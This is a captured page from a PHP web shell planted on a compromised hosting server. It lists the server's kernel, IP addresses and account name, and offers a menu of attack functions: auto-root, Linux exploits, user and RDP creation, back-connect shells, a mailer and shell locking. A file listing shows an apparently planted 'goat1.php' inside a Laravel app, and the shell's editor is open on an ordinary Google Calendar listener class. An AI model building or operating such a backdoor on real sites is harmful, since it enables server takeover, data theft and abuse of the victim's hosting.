Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.138
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo2.com /
app /
Listeners /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
127
B
-r--r--r--
HandleCreatedGoogleEvent.php
1.91
KB
-rw-r--r--
HandleDeletedEventFromGoogleCa...
460
B
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : HandleCreatedGoogleEvent.php
<?php namespace App\Listeners; use App\Models\EventGoogleCalendar; use App\Models\EventSchedule; use App\Models\GoogleCalendarIntegration; use App\Models\UserGoogleEventSchedule; use App\Repositories\GoogleCalendarRepository; use Illuminate\Support\Facades\App; class HandleCreatedGoogleEvent { /** * Handle the event. */ public function handle(object $event): void { $eventScheduleID = $event->eventScheduleID; $this->createGoogleEvent($eventScheduleID); } public function createGoogleEvent($eventScheduleID): bool { $eventSchedule = EventSchedule::with(['user', 'event'])->find($eventScheduleID); $googleCalendarConnected = GoogleCalendarIntegration::whereUserId($eventSchedule->user->id) ->exists(); if ($googleCalendarConnected) { /** @var GoogleCalendarRepository $repo */ $repo = App::make(GoogleCalendarRepository::class); $calendarLists = EventGoogleCalendar::whereUserId($eventSchedule->user->id) ->pluck('google_calendar_id') ->toArray(); $meta['name'] = 'Event Schedule Name : '.$eventSchedule->name; $meta['description'] = 'Event Name : '.$eventSchedule->event->name; $meta['lists'] = $calendarLists; $accessToken = $repo->getAccessToken($eventSchedule->user->id); $results = $repo->store($eventSchedule, $accessToken, $meta); foreach ($results as $result) { UserGoogleEventSchedule::create([ 'user_id' => $eventSchedule->user->id, 'event_schedule_id' => $eventSchedule->id, 'google_calendar_id' => $result['google_calendar_id'], 'google_event_id' => $result['id'], 'google_meet_link' => $result['google_meet_link'], ]); } } return true; } }
Close